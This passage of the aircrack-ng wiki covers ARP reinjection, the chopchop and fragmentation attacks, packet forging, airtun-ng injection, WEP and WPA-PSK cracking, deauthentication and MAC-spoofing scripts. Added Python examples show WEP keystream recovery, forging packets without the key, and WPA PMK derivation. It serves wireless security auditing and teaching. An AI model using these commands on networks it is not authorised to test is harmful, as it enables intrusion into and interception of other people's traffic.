            0x0010:  ffff ffff ffff 7092 e627 0000 7238 937c  ......p..'..r8.|
            0x0020:  8011 36c6 2b2c a79b 08f8 0c7e f436 14f7  ..6.+,.....~.6..
            0x0030:  8078 a08e 207c 17c6 43e3 fe8f 1a46 4981  .x.. |..C....FI.
            0x0040:  947c 1930 742a c85f 2699 dabe 1368 df39  .|.0t*._&....h.9
            0x0050:  ca97 0d9e 4731                           ....G1

    Use this packet ? y

You say y and then your system will start injecting:

    Saving chosen packet in replay_src-0219-123117.cap
    You should also start airodump-ng to capture replies.
    Sent 3181 packets...

At this point, if you have not already done so, start airmon-ng to capture the IVs being generated. The data count should be increasing rapidly.

Usage Tips
When you are testing at home, to generate an ARP packet to initiate the ARP injection, simply ping a non-existent IP on your network.

Usage Troubleshooting
See Tutorial: I am injecting but the IVs don't increase!

arp-request_reinjection.txt Last modified: 2007/02/19 19:37 by darkaudax

KoreK chopchop
This attack, when successful, can decrypt a WEP data packet without knowing the key. It can even work against dynamic WEP. This attack does not recover the WEP key itself, but merely reveals the plaintext. However, some access points are not vulnerable at all. Some may seem vulnerable at first but actually drop data packets shorter than 60 bytes. If the access point drops packets shorter than 42 bytes, aireplay tries to guess the rest of the missing data, as far as the headers are predictable. If an IP packet is captured, it additionally checks if the checksum of the header is correct after guessing the missing parts of it. This attack requires at least one WEP data packet.

1. First, we decrypt one packet:

    aireplay-ng -4 ath0

If this isn't successful, in most cases the access point just drops the data because it does not know the MAC which is sending it. In this case we have to use the MAC address of a connected client which is allowed to send data over the network:

    aireplay-ng -4 -h 00:09:5B:EB:C5:2B ath0

2. Let's have a look at the IP address:

    tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
    reading from file replay_dec-0627-022301.cap, link-type [...]
    IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1

3. Then, forge an ARP request. The source IP (192.168.1.100) doesn't matter, but the destination IP (192.168.1.2) must respond to ARP requests. The source MAC must belong to an associated station, in case the access point is filtering unauthenticated traffic.

    packetforge-ng replay_dec-0627-022301.xor 1 00:13:10:30:24:9C 00:09:5B:EB:C5:2B 192.168.1.100 192.168.1.2 arp.cap

4. And replay our forged ARP request:

    aireplay-ng -2 -r arp.cap ath0

See ChopchopTheory

korek_chopchop.txt Last modified: 2007/01/22 22:12 by jeroenimo

Fragmentation Attack
Description
This attack, when successful, can obtain 1500 bits of PRGA (pseudo random generation algorithm). This attack does not recover the WEP key itself, but merely obtains the PRGA. The PRGA can then be used to generate packets with packetforge-ng which are in turn used for various injection attacks. At least one data packet needs to be received from the access point in order to initiate the attack. Basically, the program obtains a small amount of keying material from the packet, then attempts to send ARP and/or LLC packets with known content to the access point (AP). If the packet is successfully echoed back by the AP, then a larger amount of keying information can be obtained from the returned packet. This cycle is repeated several times until 1500 bits of PRGA are obtained, or sometimes less than 1500 bits. The original paper by Andrea Bittau at http://www.toorcon.org/2005/slides/abittau/paper.pdf provides a much more detailed technical description of the technique.

Usage
aireplay-ng -5 -b 00:14:6C:7E:40:80 -h 00:0F:B5:AB:CB:9D ath0 Where:

-5 means run the fragmentation attack -b 00:14:6C:7E:40:80 is access point MAC address -h 00:0F:B5:AB:CB:9D is source MAC address of the packets to be injected ath0 is the interface name

Optionally, the following filters can be applied:


-b bssid : MAC address, Access Point
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length
-n len : maximum packet length
-u type : frame control, type field
-v subt : frame control, subtype field
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-w iswep : frame control, WEP bit

Optionally, the following replay options can be set:


-k IP : set destination IP in fragments - defaults to 255.255.255.255
-l IP : set source IP in fragments - defaults to 255.255.255.255

Usage Example
Notes:

The source MAC address used in the attack must be associated with the access point. To do this, you can use fake authentication or use the MAC address of an existing wireless client. For madwifi-ng drivers (Atheros chipset), you must change the MAC address of your card to the MAC address you will be injecting with, otherwise the attack will not work.

Essentially you start the attack with the following command then select the packet you want to try:
aireplay-ng -5 -b 00:14:6C:7E:40:80 -h 00:0F:B5:AB:CB:9D ath0
Waiting for a data packet...
Read 96 packets...

        Size: 120, FromDS: 1, ToDS: 0 (WEP)

              BSSID  =  00:14:6C:7E:40:80
          Dest. MAC  =  00:0F:B5:AB:CB:9D
         Source MAC  =  00:D0:CF:03:34:8C

        0x0000:  0842 0201 000f b5ab cb9d 0014 6c7e 4080  .B..........l~@.
        0x0010:  00d0 cf03 348c e0d2 4001 0000 2b62 7a01  ....4...@...+bz.
        0x0020:  6d6d b1e0 92a8 039b ca6f cecb 5364 6e16  mm.......o..Sdn.
        0x0030:  a21d 2a70 49cf eef8 f9b9 279c 9020 30c4  ..*pI.....'.. 0.
        0x0040:  7013 f7f3 5953 1234 5727 146c eeaa a594  p...YS.4W'.l....
        0x0050:  fd55 66a2 030f 472d 2682 3957 8429 9ca5  .Uf...G-&.9W.)..
        0x0060:  517f 1544 bd82 ad77 fe9a cd99 a43c 52a1  Q..D...w.....<R.
        0x0070:  0505 933f af2f 740e                      ...?./t.

Use this packet ? y

The program responds (or similar):


Saving chosen packet in replay_src-0124-161120.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
That's our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
That's our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
That's our ARP packet!
Saving keystream in fragment-0124-161129.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream

You have successfully obtained the PRGA which is stored in the file named by the program. You can now use packetforge-ng to generate one or more packets to be used for various injection attacks.

fragmentation.txt Last modified: 2007/02/13 02:50 by darkaudax

Packetforge-ng
Description
The purpose of packetforge-ng is to create encrypted packets that can subsequently be used for injection. You may create various types of packets such as ARP requests, UDP, ICMP and custom packets. The most common use is to create ARP requests for subsequent injection. To create an encrypted packet, you must have a PRGA (pseudo random generation algorithm) file. This is used to encrypt the packet you create. It is typically obtained from the aireplay-ng chopchop or fragmentation attacks.

Usage
Usage: packetforge-ng <mode> <options>

Forge options:

-p <fctrl> : set frame control word (hex)
-a <bssid> : set Access Point MAC address
-c <dmac> : set Destination MAC address
-h <smac> : set Source MAC address
-j : set FromDS bit
-o : clear ToDS bit
-e : disables WEP encryption
-k <ip[:port]> : set Destination IP [Port]
-l <ip[:port]> : set Source IP [Port]
-t ttl : set Time To Live
-w <file> : write packet to this pcap file

Source options:

-r <file> : read packet from this raw file
-y <file> : read PRGA from this file

Modes:

arp : forge an ARP packet (-0)
udp : forge a UDP packet (-1)
icmp : forge an ICMP packet (-2)
custom : build a custom packet (-9)

Usage Example
Here is an example of how to generate an ARP request packet. First, obtain a .xor file (PRGA) with either the aireplay-ng chopchop or fragmentation method. Then use the following command:
packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:0F:B5:AB:CB:9D -k 192.168.1.100 -l 192.168.1.1 -y fragment-0124-161129.xor -w arp-request

Where:

-0 indicates you want an ARP request packet generated
-a 00:14:6C:7E:40:80 is the Access Point MAC address
-h 00:0F:B5:AB:CB:9D is the source MAC address you wish to use
-k 192.168.1.100 is the destination IP, i.e. in an ARP request it is the "Who has this IP"
-l 192.168.1.1 is the source IP, i.e. in an ARP request it is the "Tell this IP"
-y fragment-0124-161129.xor is the file to read the PRGA from
-w arp-packet is the pcap file to write the packet to

Assuming you are experimenting with your own access point, the ARP request packet generated above can be decrypted with your own key. To check that the packet we just created can be decrypted, enter:
airdecap-ng -w <access point encryption key> arp-request

The results look like this:
Total number of packets read             1
Total number of WEP data packets         1
Total number of WPA data packets         0
Number of plaintext data packets         0
Number of decrypted WEP packets          1
Number of decrypted WPA packets          0

To view the packet that was just decrypted, enter:
tcpdump -n -vvv -e -s0 -r arp-request-dec

The results look like this:
reading from file arp-request-dec, link-type EN10MB (Ethernet)
18:09:27.743303 00:0f:b5:ab:cb:9d > Broadcast, ethertype ARP (0x0806), length 42: arp who-has 192.168.1.100 tell 192.168.1.1

Which is exactly what we expected. Now you can inject this ARP request packet as follows:
aireplay-ng -2 -r arp-request ath0

The program will respond as follows:


        Size: 68, FromDS: 0, ToDS: 1 (WEP)

              BSSID  =  00:14:6C:7E:40:80
          Dest. MAC  =  FF:FF:FF:FF:FF:FF
         Source MAC  =  00:0F:B5:AB:CB:9D

        0x0000:  0841 0201 0014 6c7e 4080 000f b5ab cb9d  .A....l~@.......
        0x0010:  ffff ffff ffff 8001 6c48 0000 0999 881a  ........lH......
        0x0020:  49fc 21ff 781a dc42 2f96 8fcc 9430 144d  I.!.x..B/....0.M
        0x0030:  3ab2 cff5 d4d1 6743 8056 24ec 9192 c1e1  :.....gC.V$.....
        0x0040:  d64f b709                                .O..

Use this packet ? y
Saving chosen packet in replay_src-0124-163529.cap
You should also start airodump-ng to capture replies.
End of file.

By entering y above, the packet you created with packetforge-ng is then injected.

Usage Tips
Most access points really don't care what IPs are used for the ARP request. As a result you can use 255.255.255.255 for the source and destination IPs, so the packetforge-ng command becomes:
packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:0F:B5:AB:CB:9D -k 255.255.255.255 -l 255.255.255.255 -y fragment-0124-161129.xor -w arp-request

Usage Troubleshooting
A common mistake people make is to include either or both of the -j and -o flags and create invalid packets. These flags adjust the FromDS and ToDS flags in the generated packet. Unless you are doing something special and really know what you are doing, don't use them. In general, they are not needed.

packetforge-ng.txt Last modified: 2007/01/27 20:49 by darkaudax

Airtun-ng
Description
Airtun-ng is a virtual tunnel interface creator. There are two basic functions:

Allow all encrypted traffic to be monitored for wireless Intrusion Detection System (wIDS) purposes.
Inject arbitrary traffic into a network.

In order to perform wIDS data gathering, you must have the encryption key and the bssid for the network you wish to monitor. Airtun-ng decrypts all the traffic for the specific network and passes it to a traditional IDS system such as snort.

Traffic injection can be bidirectional if you have the full encryption key. It is outgoing unidirectional if you only have the PRGA obtained via the chopchop or fragmentation attacks. The prime advantage of airtun-ng over the other injection tools in the aircrack-ng suite is that you may use any tool subsequently to create, inject or sniff packets. Airtun-ng only runs on Linux platforms.

Usage
usage: airtun-ng <options> <replay interface>

-x nbpps : maximum number of packets per second (optional)
-a bssid : set Access Point MAC address (mandatory)
-i iface : capture packets from this interface (optional)
-y file : read PRGA from this file (optional / one of -y or -w must be defined)
-w wepkey : use this WEP-KEY to encrypt packets (optional / one of -y or -w must be defined)
-t tods : send frames to AP (1) or to client (0) (optional / defaults to 0)

Scenarios
wIDS
The first scenario is wIDS. Start your wireless card in monitor mode then enter:
airtun-ng -a 00:14:6C:7E:40:80 -w 1234567890 ath0

Where:

-a 00:14:6C:7E:40:80 is the MAC address of the access point to be monitored
-w 1234567890 is the encryption key
ath0 is the interface currently running in monitor mode

The system responds:


created tap interface at0
WEP encryption specified. Sending and receiving frames through ath0.
FromDS bit set in all frames.

You notice above that it created the at0 interface. Switch to another console session; you must now bring this interface up in order to use it:
ifconfig at0 up

This interface (at0) will receive a copy of every wireless network packet. The packets will have been decrypted with the key you provided. At this point you may use any tool to sniff and analyze the traffic, for example tcpdump or snort.

WEP injection
The next scenario is where you want to inject packets into the network. Do exactly the same steps as in the first scenario except define a valid IP address for the network when you bring the at0 interface up:

ifconfig at0 192.168.1.83 netmask 255.255.255.0 up

You can confirm this by entering ifconfig at0 and checking the output.
at0       Link encap:Ethernet  HWaddr 36:CF:17:56:75:27
          inet addr:192.168.1.83  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::34cf:17ff:fe56:7527/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:192 errors:0 dropped:0 overruns:0 frame:0
          TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:500
          RX bytes:25113 (24.5 KiB)  TX bytes:516 (516.0 b)

At this point you can use any tool you want and send traffic via the at0 interface to wireless clients. Please note that by default the FromDS flag is set, meaning packets are flagged as going to the wireless clients. If you wish to communicate via the AP or with wired clients, specify the option -t 1 when you start airtun-ng. IMPORTANT NOTE: The normal rules apply to injection here as well, for example being associated with the AP, having the wireless card MAC match the injected source, etc. You also have to remember to set the at0 MAC address. An interesting use of this scenario is that it allows you to use a WEP encrypted network with a driver that supports injection but no WEP encryption, as not all drivers support 256bit WEP or 512bit WEP keys or WPA (once it is implemented) and so on.

PRGA injection
The next scenario is where you want to inject packets into the network but do not have the full WEP key. You only have the PRGA obtained via a chopchop or fragmentation attack. In this case you may only inject packets outbound. There is no way to decrypt inbound packets since you do not have the full WEP key. Start your wireless card in monitor mode then enter:
airtun-ng -a 00:14:6C:7E:40:80 -y fragment-0124-153850.xor ath0

Notice that the PRGA file was specified via the -y option. The system responds (notice it correctly states no reception):
created tap interface at0
WEP encryption by PRGA specified. No reception, only sending frames through ath0.
FromDS bit set in all frames.

From here you can define a valid IP address for the network when you bring the at0 interface up:
ifconfig at0 192.168.1.83 netmask 255.255.255.0 up

You can confirm this by entering ifconfig at0. Again, at this point you can use any tool you want and send traffic via the at0 interface to wireless clients.

Connecting to Two Access Points


The next scenario is connecting to two wireless networks at the same time. This is done by simply starting airtun-ng twice and specifying the appropriate bssid MAC for each. If the two APs are on the same channel, then everything should be fine. If they don't share one channel, you can listen with airodump-ng on both channels (not simultaneously, but hopping between only those two channels). Assuming the two APs you want to connect to are on channels 1 and 11, enter airodump-ng -c 1,11 ath0.

So you'll get two tunnel interfaces (at0 and at1), each pointing to a different AP. If they don't use the same private subnet range, then you can use them at the same time, i.e. you are connected to more than one AP. In theory, you could do this for even more than two APs, but the quality of the link would be even worse when hopping on three channels.

Copy packets from the optional interface


The next scenario is copying packets from the optional interface. The -i <wireless interface> option is just like the aireplay-ng -i parameter. It is used to specify a source to read packets from other than the given injection interface (ath0 in the examples above). A typical use is to listen with a very sensitive card on one interface and to inject with a high power adapter, which has a lower sensitivity.

Usage Tips
This tool is extremely powerful and utilizes advanced concepts. Please make sure you have built your knowledge and experience with the other tools in the aircrack-ng suite prior to using it.

Usage Troubleshooting
Windows platforms - I can't find the airtun-ng tool! Answer: airtun-ng only runs on Linux.

airtun-ng.txt Last modified: 2007/01/29 22:07 by mister_x

Tools
WZCook
It recovers WEP keys from XP's Wireless Zero Configuration utility. This is experimental software, so it may or may not work depending on your Service Pack level. WZCOOK can also display the PMK (Pairwise Master Key), a 256-bit value which is the result of the passphrase hashed 8192 times together with the ESSID and the ESSID length. The passphrase itself can't be recovered; however, knowing the PMK is enough to connect to a WPA-protected wireless network with wpa_supplicant (see the Windows README). Your wpa_supplicant.conf configuration file should look like:
network={
    ssid="my_essid"
    pmk=5c9597f3c8245907ea71a89d[...]9d39d08e
}

If you don't use the WZC service but use the USR utility, get this registry value and try it here:
HKey_Current_User/Software/ACXPROFILE/profilename/dot11WEPDefaultKey1

ivstools
This tool handles .ivs files. You can either merge or convert them.

Merge
Use merge option to merge multiple .ivs files. Example:
ivstools --merge dump1.ivs dump2.ivs dump3.ivs out.ivs

It will merge dump1.ivs, dump2.ivs and dump3.ivs into out.ivs. You can merge more than two files; the output file must be the last argument. Note: aircrack-ng is able to open multiple files (pcap or ivs).

Convert
Use convert option to convert a pcap file (by default, they have .cap extension) to a .ivs file. Example:
ivstools --convert out.cap out.ivs

It will save the IVs from out.cap to out.ivs.
Note: Kismet produces pcap files (the extension is .dump) that can be converted.
WARNING: pcap2ivs from aircrack, and aircrack-ng up to v0.2.1, have a bug which creates broken captures. You should not use pcap2ivs from those versions. If you have a broken IVs file from using the broken versions, then try using FixIvs to recover it.

tools.txt Last modified: 2007/02/15 22:55 by darkaudax

FAQ
What tutorials are available ?
The Tutorials page has many tutorials specific to the aircrack-ng suite. If your question is not answered on this FAQ page, be sure to check out these other resources:

The Forum
User Documentation by platform (Linux, Windows)

The links page also has generic wireless information and tutorials.

How do I crack a static WEP key ?


The basic idea is to capture as much encrypted traffic as possible using airodump-ng. Each WEP data packet has an associated 3-byte Initialization Vector (IV); after a sufficient number of data packets have been collected, run aircrack-ng on the resulting capture file. aircrack-ng will then perform a set of statistical attacks developed by a talented hacker named KoreK.

What are the authentication modes for WEP ?


There are two authentication modes for WEP:

Open System Authentication: This is the default mode. All clients are accepted by the AP, and the key is never checked, meaning association is always granted. However, if your key is incorrect you won't be able to receive or send packets (because decryption will fail), so DHCP, ping etc. will time out.

Shared Key Authentication: The client has to encrypt a challenge before association is granted by the AP. This mode is flawed and leads to keystream recovery, so it's never enabled by default.

The NetGear Wireless Basics Manual has a good description of WEP Wireless Security including diagrams of the packet flows.
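Worked example added here (not code from the aircrack-ng wiki): the keystream recovery that the Shared Key answer warns about, carried through to the forging step that the packetforge-ng section relies on. The key, IV, challenge and ARP contents are constructed; the RC4 and CRC-32 parts are the standard WEP construction.

```python
"""Added example, not from the aircrack-ng wiki. A WEP body is
(plaintext || CRC-32 ICV) XOR RC4(IV || key). Shared Key authentication exposes a
(plaintext, ciphertext) pair, which yields the keystream for one IV, and
packetforge-ng applies a recovered keystream exactly as forge_with_keystream() does.
Key, IV, challenge and ARP contents below are constructed for the demo."""
import binascii
from typing import Optional, Tuple


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Textbook RC4 (KSA + PRGA). WEP's per-packet key is IV || shared key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return (binascii.crc32(data) & 0xFFFFFFFF).to_bytes(4, "little")


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(iv: bytes, key: bytes, plaintext: bytes) -> bytes:
    """Station side: returns IV || encrypted (plaintext || ICV). Key-index byte omitted."""
    body = plaintext + wep_icv(plaintext)
    return iv + xor_bytes(body, rc4_keystream(iv + key, len(body)))


def wep_decrypt(key: bytes, frame: bytes) -> Optional[bytes]:
    """AP side: strip IV, decrypt, verify ICV. None means the AP would discard the frame."""
    iv, ciphertext = frame[:3], frame[3:]
    body = xor_bytes(ciphertext, rc4_keystream(iv + key, len(ciphertext)))
    data, icv = body[:-4], body[-4:]
    return data if wep_icv(data) == icv else None


def keystream_from_shared_key_auth(challenge: bytes, response: bytes) -> Tuple[bytes, bytes]:
    """Passive observer of Shared Key authentication: the 128-byte challenge goes out in
    clear and comes back encrypted, so XOR yields the keystream (IV and 132 bytes)."""
    iv, ciphertext = response[:3], response[3:]
    return iv, xor_bytes(ciphertext, challenge + wep_icv(challenge))


def forge_with_keystream(iv: bytes, keystream: bytes, plaintext: bytes) -> bytes:
    """What packetforge-ng does with a .xor file: no key, only the keystream of this IV.
    The packet must fit inside the keystream, hence the tools' push for 1500 bytes."""
    body = plaintext + wep_icv(plaintext)
    if len(body) > len(keystream):
        raise ValueError("need %d keystream bytes, have %d" % (len(body), len(keystream)))
    return iv + xor_bytes(body, keystream)


# Constructed ARP request in LLC/SNAP framing, matching the wiki's packetforge-ng example
# ("arp who-has 192.168.1.100 tell 192.168.1.1" from 00:0F:B5:AB:CB:9D).
LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")
ARP_REQUEST = LLC_SNAP_ARP + bytes.fromhex(
    "0001080006040001" "000fb5abcb9d" "c0a80101" "000000000000" "c0a80164")

DEMO_KEY = bytes.fromhex("1234567890")   # constructed 40-bit key
DEMO_IV = bytes.fromhex("0a0b0c")         # constructed IV


def demo() -> bool:
    """Observe one Shared Key exchange, then forge an ARP the AP accepts without the key."""
    challenge = bytes(range(128))                                 # constructed challenge
    response = wep_encrypt(DEMO_IV, DEMO_KEY, challenge)          # station proves the key
    iv, keystream = keystream_from_shared_key_auth(challenge, response)
    forged = forge_with_keystream(iv, keystream, ARP_REQUEST)     # key never used here
    return wep_decrypt(DEMO_KEY, forged) == ARP_REQUEST
```

The same arithmetic is why the fragmentation and chopchop attacks aim for a full 1500-byte keystream: a recovered keystream is only good for packets no longer than itself, under that one IV.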

How do I know my WEP key is correct ?


Just because you seem to have successfully connected to the access point doesn't mean your WEP key is correct! To check your WEP key, the best way is to decrypt a capture file with the airdecap-ng program.

How many IVs are required to crack WEP ?


WEP cracking is not an exact science. The number of required IVs depends on the WEP key length, and it also depends on your luck. Usually, 40-bit WEP (64 bit key) can be cracked with 300,000 IVs, and 104-bit WEP (128 bit key) can be cracked with 1,000,000 IVs; if you're out of luck you may need two million IVs, or more. There's no way to know the WEP key length: this information is kept hidden and never announced, either in management or data packets; as a consequence, airodump-ng cannot report the WEP key length. Thus, it is recommended to run aircrack-ng twice: when you have 250,000 IVs, start aircrack-ng with -n 64 to crack 40-bit WEP. Then if the key isn't found, restart aircrack-ng (without the -n option) to crack 104-bit WEP.

How can I know what is the key length ?


You can't know what the key length is; there's no information at all in wireless packets, which is why you have to try different lengths. Most of the time, it's a 128 bit key.

Will WPA be cracked in the future ?


It's extremely unlikely that WPA will be cracked just like WEP was. The major problem with WEP is that the shared key is appended to the IV; the result is directly used to feed RC4. This overly simple construction is prone to a statistical attack, since the first ciphertext bytes are strongly correlated with the shared key (see Andrew Roos' paper). There are basically two counter-measures against this attack: 1. mix the IV and the shared key using a hash function, or 2. discard the first 256 bytes of RC4's output. There has been some disinformation in the news about the flaws of TKIP: for now, TKIP is reasonably secure, but it is also living on borrowed time since it still relies on the same RC4 algorithm that WEP relied on.

Actually, TKIP (WPA1) is not vulnerable: for each packet, the 48-bit IV is mixed with the 128-bit pairwise temporal key to create a 104-bit RC4 key, so there's no statistical correlation at all. Furthermore, WPA provides counter-measures against active attacks (traffic reinjection), includes a stronger message integrity code (Michael), and has a very robust authentication protocol (the 4-way handshake). The only vulnerability so far is a dictionary attack, which fails if the passphrase is robust enough. WPA2 (aka 802.11i) is exactly the same as WPA1, except that CCMP (AES in counter mode) is used instead of RC4 and HMAC-SHA1 is used instead of HMAC-MD5 for the EAPOL MIC. Bottom line, WPA2 is a bit better than WPA1, but neither is going to be cracked in the near future.

How can I crack a WPA-PSK network ?


You must sniff until a handshake takes place between a wireless client and the access point. To force the client to reauthenticate, you can start a deauth attack with aireplay-ng. Also, a good dictionary is required. FYI, it's not possible to pre-compute large tables of Pairwise Master Keys like rainbowcrack does, since the passphrase is salted with the ESSID.
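Added example (not code from the wiki) covering both the PMK that WZCook displays in the Tools section and the ESSID salting this answer mentions. The passphrases, ESSIDs and wordlist are constructed; the "password"/"IEEE" value used in the comments is the IEEE 802.11i Annex H test vector.

```python
"""Added example, not from the aircrack-ng wiki. WPA-PSK's Pairwise Master Key is
PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 256 bits). SHA-1 gives
20 bytes per block, so 256 bits need two blocks of 4096 iterations: the 8192 hash
computations the Tools page mentions. Because the ESSID is the salt, a table of
passphrase -> PMK pairs is only valid for one ESSID, which is the point of the FAQ answer.
IEEE 802.11i Annex H vector: ("password", "IEEE") -> f42c6fc52df0ebef9ebb4b90b38a5f90..."""
import hashlib
import hmac
from typing import Dict, Iterable, Tuple


def wpa_pmk(passphrase: str, essid: str) -> bytes:
    """Library PBKDF2; 8 to 63 characters is the valid WPA passphrase range."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8 to 63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def wpa_pmk_counting(passphrase: str, essid: str) -> Tuple[bytes, int]:
    """PBKDF2-HMAC-SHA1 written out, returning (PMK, number of HMAC-SHA1 computations)
    so the "hashed 8192 times" figure can be checked rather than taken on trust."""
    pw, salt = passphrase.encode(), essid.encode()
    out, calls = b"", 0
    for block in (1, 2):                       # two 20-byte blocks cover 32 bytes
        u = hmac.new(pw, salt + block.to_bytes(4, "big"), hashlib.sha1).digest()
        calls += 1
        t = u
        for _ in range(4095):                  # remaining iterations of this block
            u = hmac.new(pw, u, hashlib.sha1).digest()
            calls += 1
            t = bytes(a ^ b for a, b in zip(t, u))
        out += t
    return out[:32], calls


def pmk_table(essid: str, wordlist: Iterable[str]) -> Dict[str, str]:
    """Passphrase -> PMK hex for one ESSID; the dictionary work a cracker has to redo per network."""
    return {w: wpa_pmk(w, essid).hex() for w in wordlist if 8 <= len(w) <= 63}


def table_reusable(essid_a: str, essid_b: str, wordlist: Iterable[str]) -> bool:
    """True only if a table built for essid_a also gives the right PMKs for essid_b.
    With distinct ESSIDs this is False, which is why no single rainbow table exists."""
    words = list(wordlist)
    return pmk_table(essid_a, words) == pmk_table(essid_b, words)
```

The practical consequence for network owners is that a default or common ESSID reduces the salt to a shared value, so a long passphrase matters more when the ESSID is not unique.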

Where can I find good wordlists ?


The easiest way is do an Internet search for word lists and dictionaries. Also check out web sites for password cracking tools. Many times they have references to word lists. Here are a couple of sites:

http://ftp.se.kde.org/pub/security/tools/net/Openwall/wordlists/
ftp://ftp.ox.ac.uk/pub/wordlists/

How do I merge multiple capture files ?


You may use File Merge... in Wireshark or Ethereal. From the command line you may use the mergecap program to merge .cap files (part of the Wireshark/Ethereal package or the win32 distribution):
mergecap -w out.cap test1.cap test2.cap test3.cap

It will merge test1.cap, test2.cap and test3.cap into out.cap. You may use the ivstools program (part of the aircrack-ng package) to merge .ivs files.

Can I convert cap files to ivs files ?


You may use the ivstools program (part of the aircrack-ng package).

Can I use Wireshark/Ethereal to capture 802.11 packets ?


Under Linux, simply set the card up in monitor mode with the airmon-ng script. Under Windows, Wireshark can capture 802.11 packets using AirPcap. Except in very rare cases, Ethereal cannot capture 802.11 packets under Windows.

Can Wireshark/Ethereal decode WEP or WPA data packets ?


Ethereal and Wireshark up to and including 0.99.4 can decrypt WEP. Go to Edit > Preferences > Protocols > IEEE 802.11, select 1 in the WEP key count and enter your WEP key below. Wireshark 0.99.5 and above can decrypt WPA as well. Go to Edit > Preferences > Protocols > IEEE 802.11, select Enable decryption, and fill in the key according to the instructions in the preferences window. You can also select Decryption Keys... from the wireless toolbar if it's displayed.

What are the different wireless filter expressions ?


The Wireshark display filter reference lists wlan (general 802.11), wlan_mgmt (802.11 management), wlancap (AVS capture header), wlancertextn (802.11 certificate extensions), and radiotap (radiotap header) (Ethereal Wireless Filters from www.remote-exploit.org)

How do I decrypt a capture file ?


You may use the airdecap-ng program.

How do I change my card's MAC address ?


Under Linux, the following information applies. One method is:
ifconfig ath0 down
ifconfig ath0 hw ether 00:11:22:33:44:55
ifconfig ath0 up

Be aware that the example above does not work with every driver. The easier way is to use the macchanger package. The documentation and download are at http://www.alobbs.com/macchanger. This link tends to be slow or not answer. You can do an Internet search for macchanger, or here are some alternate links:

http://mirrors.usc.edu/pub/gnu/macchanger/
http://ftp.gnu.org/gnu/macchanger/
http://ftp.azc.uam.mx/mirrors/gnu/macchanger/

Here are scripts which use the macchanger package and work well with madwifi-ng drivers.

Script 1 - Invoked with macc.sh XX:XX:XX:XX:XX:XX
#!/bin/sh
cardctl eject
cardctl insert
wlanconfig ath0 destroy
ifconfig wifi0 up
ifconfig wifi0 down
macchanger wifi0 -m $1
wlanconfig ath0 create wlandev wifi0 wlanmode monitor

Script 2
#!/bin/sh
# Change the following variables to match your requirements
FAKEMAC="00:14:6C:71:41:32"
IFACE="ath0"
WIFACE="wifi0"
#
# The interface is brought up and down twice otherwise
# it causes a system exception and the system freezes
#
ifconfig $IFACE down
wlanconfig $IFACE destroy
wlanconfig $IFACE create wlandev $WIFACE wlanmode monitor
ifconfig $IFACE up
ifconfig $IFACE down
macchanger $WIFACE -m $FAKEMAC
wlanconfig $IFACE destroy
wlanconfig $IFACE create wlandev $WIFACE wlanmode monitor
ifconfig $IFACE up
ifconfig $IFACE
iwconfig
echo " "
echo "The wireless card MAC has been set to $FAKEMAC"
echo " "

Under Windows, you may use:


macmakeup
Technitium MAC Address Changer
ChangeMacAddress (there is a cost for this product)

Troubleshooting Tip: A normal MAC address looks like this: 00:09:5B:EC:EE:F2. The first half (00:09:5B) of each MAC address is the manufacturer. The second half (EC:EE:F2) is unique to each network card. Many access points will ignore invalid MAC addresses, so make sure to use a valid wireless card manufacturer code when you make up MAC addresses. Otherwise your packets may be ignored.

Is my card compatible with airodump-ng / aireplay-ng ?


First of all, search Google to find which chipset your card has. For example, if you have a Linksys WPC54G, search for "wpc54g chipset linux". Then check it in compatibility_drivers.

Can I have multiple instances of aireplay-ng running at the same time?


Yes, you can.

How to use spaces, double quote and single quote in AP names?


You have to prefix those special characters with a \.

What is the best transmit power?


See Various tips.

What is the size of ARP packets ?


When captured through a wireless interface, 68 bytes is typical for ARP packets originating from wireless clients, and 86 bytes is typical for ARP requests from wired clients. On Ethernet, ARP packets are typically 60 bytes long when received. When these are relayed by a wireless access point, they are 86 bytes. This is, of course, because of the wireless headers. If a wireless client sends an ARP, it is typically 42 bytes long and becomes 68 bytes when relayed by the AP.
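The arithmetic behind those four sizes, as an added example that is not from the wiki. The header lengths are the fixed 802.11 and WEP framing values; the sizes the answer quotes fall out of them, and the last function is the size test that the -m/-n packet-length filters elsewhere on this page rely on.

```python
# Added example, not from the aircrack-ng wiki: deriving the ARP sizes quoted in the FAQ
# (42/60 bytes on Ethernet, 68/86 bytes on 802.11 with WEP) from fixed header lengths.
ETH_HDR = 14          # destination MAC, source MAC, EtherType
ETH_MIN_FRAME = 60    # minimum Ethernet frame without FCS; wired senders pad up to this
ARP_LEN = 28          # ARP request/reply for Ethernet + IPv4
DOT11_DATA_HDR = 24   # three-address 802.11 data header (FromDS or ToDS, not both)
WEP_IV_HDR = 4        # 3-byte IV + key-index byte in front of the encrypted body
LLC_SNAP = 8          # LLC/SNAP header that carries the EtherType inside 802.11
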